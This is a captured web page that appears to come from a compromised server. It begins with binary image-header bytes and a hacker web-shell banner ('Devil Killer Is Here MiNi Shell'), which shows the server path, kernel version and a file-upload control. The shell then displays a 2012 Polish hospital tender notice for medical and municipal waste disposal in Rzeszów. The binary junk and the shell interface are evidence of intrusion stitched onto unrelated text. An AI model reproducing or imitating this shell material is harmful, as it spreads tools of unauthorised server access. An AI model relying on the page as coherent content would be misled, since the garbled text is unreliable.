JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120713/250508-N-2012.html

<p class="kh_header"><b>Rzeszów: Usługi załadunku, transportu, unieszkodliwiania odpadów medycznych i odpadów opakowaniowych oraz usługi odbioru i wywozu odpadów komunalnych</b><br>
<b>Numer ogłoszenia: 250508 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Fryderyka Chopina , ul. Szopena 2, 35-055 Rzeszów, woj. podkarpackie, tel. 017 8666 096, faks 017 8666 097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szpital.rzeszow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi załadunku, transportu, unieszkodliwiania odpadów medycznych i odpadów opakowaniowych oraz usługi odbioru i wywozu odpadów komunalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Usługi załadunku, transportu, unieszkodliwiania odpadów medycznych i odpadów opakowaniowych oraz usługi odbioru i wywozu odpadów komunalnych wyszczególnione w dwóch częściach dla Wojewódzkiego Szpitala Specjalistycznego im. F. Chopina w Rzeszowie, a w tym:
Część nr 1 - Usługi załadunku, transportu i unieszkodliwiania odpadów:
a) medycznych o kodach:
- 18 01 02 tj. części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania (z wyłączeniem 18 01 03);
- 18 01 03 tj. inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt; 
-  18 01 06 tj. chemikalia w tym odczynniki chemiczne zawierające substancje niebezpieczne;
-  18 01 07 chemikalia, w tym odczynniki chemiczne, inne niż wymienione w 18 01 06;
-  18 01 08 tj. leki cytotoksyczne  i cytostatyczne;
-  18 01 09 leki inne niż wymienione w 18 01 08,
b) opakowaniowych o kodzie:
-  15 02 03 tkaniny do wycierania i ubrania ochronne inne niż wymienione w 15 02 02.
Część nr 2 - Usługi odbioru i wywozu odpadów komunalnych z terenu:
- Wojewódzkiego Szpitala Specjalistycznego przy ul. Szopena 2 w Rzeszowie, 
- Domu Pielęgniarek, ul. Naruszewicza 11 w Rzeszowie,
- Oddziału Dziennego Psychiatrycznego ul. Szopena 15 w Rzeszowie.
2.Przedmiot zamówienia obejmuje załadunek, transport i unieszkodliwianie odpadów medycznych i opakowaniowych, w ilościach wyszczególnionych w Formularzu cenowo-ofertowym (Załącznik nr 1 do SIWZ - do Części nr 1) oraz odbiór i wywóz odpadów komunalnych w ilościach wyszczególnionych w Formularzu cenowo-ofertowym (Załącznik nr 1 do SIWZ do Części nr 2). Formularze cenowo-ofertowe do Części 1 i 2 stanowią integralną Część SIWZ.
3.Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia w ilości jak opisano w Załącznikach nr 1 do SIWZ do każdej z Części przez okres 12 miesięcy od daty podpisania umowy.
4.Wymagania zamawiającego: 
Dotyczy Części nr 1:
Odbiór odpadów z terenu Szpitala przy ul. Szopena 2 w Rzeszowie - od poniedziałku do piątku 5 razy w tygodniu. Odbiorca odpadów zapewnia własny załadunek. 
Wykonawca winien odbierać odpady niebezpieczne własnym transportem i na swój koszt, przy zachowaniu wymogów sanitarnych obowiązujących w tym zakresie:
a)Usługi winny być świadczone zgodnie z Ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian.);
b)Transport odpadów niebezpiecznych z miejsc ich powstawania do miejsc unieszkodliwiania odpadów winien odbywać się z zachowaniem przepisów obowiązujących przy transporcie towarów niebezpiecznych (Ustawa z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian.);
c)Zakazuje się unieszkodliwiania zakaźnych odpadów medycznych i zakaźnych odpadów weterynaryjnych innymi metodami niż te, które prowadzą do obniżenia zawartości ogólnego węgla organicznego do 5% w tych odpadach. Zakazuje się unieszkodliwiania tych odpadów przez ich współspalanie (art. 42 ust. 1a Ustawy o odpadach tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian.);
d)Unieszkodliwianie odpadów powinno odbywać się zgodnie z treścią art. 9 Ustawy o odpadach tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian. 
Dotyczy Części nr 2:
Odbiór odpadów:
a)Wojewódzki Szpital Specjalistyczny im. F. Chopina przy ul. Szopena 2 w Rzeszowie - codziennie od poniedziałku do soboty;             	    
b)Dom Pielęgniarek przy ul. Naruszewicza 11 w Rzeszowie - jeden raz w tygodniu;
c)Oddział Dzienny Psychiatryczny przy ul. Szopena 15 w Rzeszowie - jeden raz w tygodniu. 
Wykonawca winien odbierać odpady komunalne własnym transportem i na swój koszt, przy zachowaniu wymogów sanitarnych obowiązujących w tym zakresie.
Wykonawca dostarczy na swój koszt kontenery na odpady komunalne w ilościach zabezpieczających potrzeby ich gromadzenia. 
Usługi dotyczące odpadów komunalnych winny być świadczone zgodnie z Ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian.) oraz Ustawą z dnia 11 kwietnia 2012r. o utrzymaniu czystości i porządku w gminach (j.t. Dz.U. 2012 nr 0 poz. 391).
5.Zamawiający nie dopuszcza składania ofert: alternatywnych i równoważnych. 6. Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV):  Kod CPV: Główny przedmiot:  90.52.40.00-6 - usługi w zakresie odpadów medycznych. Dodatkowe przedmioty: 90.51.20.00-9 -  usługi transportu odpadów, Kat. CPC: 16.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wnosi się przed upływem terminu składania ofert. Kwota wadium dla poszczególnych części   wynosi: 
Część nr 1 - 2 500,00 zł;
Część nr 2 -  2 000,00 zł.
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz.275 z późn.zmian.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że posiada aktualną: w przypadku składania oferty do Części nr 1:
- koncesję, zezwolenie lub licencję na prowadzenie działalności gospodarczej w zakresie objętym przedmiotem zamówienia tj. zezwolenie na prowadzenie działalności w zakresie zbierania, unieszkodliwiania odpadów w/w, wydane przez właściwy organ zgodnie z Ustawą z dnia 27 kwietnia 2001 r. o odpadach (j.t. Dz. U. nr 185 z 2010 r., poz. 1243 z późn. zm.), w przypadku składania oferty do Części nr 2:
- koncesję, zezwolenie lub licencję na prowadzenie działalności gospodarczej w zakresie objętym przedmiotem zamówienia zgodnie z Ustawą z dnia 11 kwietnia 2012r. o utrzymaniu czystości i porządku w gminach (j.t. Dz.U. 2012 nr 0 poz. 391).
Ocena spełniania tego warunku nastąpi na podstawie weryfikacji przedstawionej koncesji, zezwolenia lub licencji.
Brak koncesji, zezwolenia lub licencji o których mowa powyżej, zostanie oceniony jako niespełnienie warunku, a Wykonawca  podlegać będzie wykluczeniu z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Zamawiający wymaga, by: 
w Części nr 1-
Usługi świadczone były zgodnie z wymaganiami SIWZ oraz Ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian.); 
w Części nr 2-
A) Usługi będące przedmiotem zamówienia świadczone były zgodnie z:
a)wymaganiami SIWZ;
b)Ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz. U. z 2010 r. Nr .185, poz. 1243  z póżn. zmian.);
c)Ustawą z dnia 11 kwietnia 2012r. o utrzymaniu czystości i porządku w gminach (j.t. Dz.U. 2012 nr 0 poz. 391) 
B) Wykonawca posiadał aktualną umowę ze Składowiskiem Odpadów Komunalnych.
2. W celu potwierdzenia wymagań opisanych powyżej Wykonawca winien załączyć do oferty: Oświadczenie według wzoru na Załączniku nr 6 do SIWZ (oryginał).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dopuszcza się składanie wspólnego oświadczenia o treści jak wyżej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy:
a)Formularz cenowo - ofertowy dla danej oferowanej Części, sporządzony według wzoru załączonego do SIWZ (Załączniki nr 1 do SIWZ- oryginały), 
b)Formularz oferty (Załącznik nr 2 do SIWZ- oryginał).

Dobrze byłoby, by oferta zawierała wszystkie ewentualne zmiany wprowadzone w czasie trwania postępowania. Oferta musi być zgodna z SIWZ.

2.Potwierdzenie wniesienia wadium - kserokopia wniesionego wadium wpięta do oferty w kolejności.        Wadium wniesione w formie innej niż w pieniądzu należy złożyć w ofercie luzem celem zrealizowania dyspozycji zawartej w art. 46 ustawy Pzp dot. zwrotu wadium.
3.Jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej, wymagane jest przedstawienie pełnomocnictwa. Pełnomocnictwo to musi zostać dołączone do oferty, musi w swojej treści jednoznacznie wskazywać uprawnienie do podpisania oferty a także musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).

UWAGA: Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek w art. 22 ust. 1 pkt 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych - (j.t. Dz.U. Nr 113 z 2010r., poz. 759, z późn. zm.) zwanej dalej Pzp dotyczący posiadania odpowiednich uprawnień winni spełniać ci członkowie konsorcjum, którzy będą faktycznie realizować część zamówienia, do której wykonania wymagane jest posiadanie uprawnień ustawowych. 
Warunki określone w pkt. w art. 22 ust. 1 pkt 2, 3 i 4 Pzp winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie. Konieczność ich spełniania odnosi się do konsorcjum jako całości, nie do jego poszczególnych członków. 
Na potwierdzenie spełniania warunków z art. 22 ust. 1 pkt 2, 3 i 4 Pzp  nie postawiono żadnych szczególnych warunków poza oświadczeniem.
Dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z postępowania składa każdy z wykonawców oddzielnie.
Wszelka korespondencja dokonywana będzie wyłącznie z liderem (pełnomocnik, partner wiodący).
Rozliczenia dokonywane będą z liderem lub/i partnerem konsorcjum w zależności, który z członków konsorcjum realizować będzie zamówienie.
Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 Pzp może złożyć lider (pełnomocnik, partner wiodący) w imieniu konsorcjum. 
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust.1 Pzp składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.
W przypadku wymagań merytorycznych, przedmiotowych, dopuszcza się możliwość składania oświadczeń i dokumentów przez lidera konsorcjum</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Pzp Zamawiający przewidział możliwość dokonania zmiany umowy w Specyfikacji Istotnych Warunków Zamówienia oraz określił warunki tych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. F. Chopina , ul. Szopena 2, 35-055 Rzeszów, Dział Zamówień Publicznych, pokój nr 9 , bud. J.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 12:00, miejsce: Zamawiającego przy ul. Szopena 2, w Kancelarii Ogólnej pok. nr 3, bud. C. w godz. od 07:30 do 15:05, od poniedziałku do piątku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. W Sekcji IV.2.1 oraz w Załącznikach I pkt 4 dla Części nr 1 i 2: Kryteria oceny ofert podano: Najniższa cena. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryterium ceny brutto za realizację przedmiotu zamówienia, podanej na Formularzu cenowo-ofertowym (Załącznik nr 1 do SIWZ). Za najkorzystniejszą zostanie uznana oferta niepodlegająca odrzuceniu, z najniższą ceną (brutto), obejmującą realizację całości zamówienia w danej, oferowanej Części. Oferta z najniższą ceną (brutto) uzyska największą ilość punktów (10,00), pozostałe oferty mniejszą ilość punktów wynikającą z wyliczenia matematycznego, wg wzoru podanego w SIWZ. 2. Planowany termin otwarcia ofert: 24.07.2012r., o godzinie 13:00. Miejsce otwarcia ofert: w pokoju nr 9, bud. J Szpitala, w siedzibie Zamawiającego przy ulicy Szopena 2. 3. Sygnatura sprawy: WSS.XII.252/Z/86/12, Postępowanie nr 42. 4. W oparciu o art. 41 pkt 12 Pzp: nie zamierza się zawierać umowy ramowej. 5.Uwaga do Sekcji III.4.2): - punktor pierwszy: W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, Oświadczenie z art. 24 ust.1 ustawy Pzp składa każdy z wykonawców oddzielnie, wg wzoru na załączniku nr 4 do SIWZ (oryginał). - punktor drugi: Oświadczenie z art. 24 ust. 1 pkt 2 Pzp składają osoby fizyczne prowadzące działalność gospodarczą, w tym każdy ze wspólników spółki cywilnej, wg wzoru na załączniku nr 5 do SIWZ(oryginał). - punktor trzeci: Spółki cywilne przedstawiają zaświadczenie urzędu skarbowego dla wszystkich wspólników oraz zaświadczenie na całą spółkę cywilną z jej nazwą.</p>
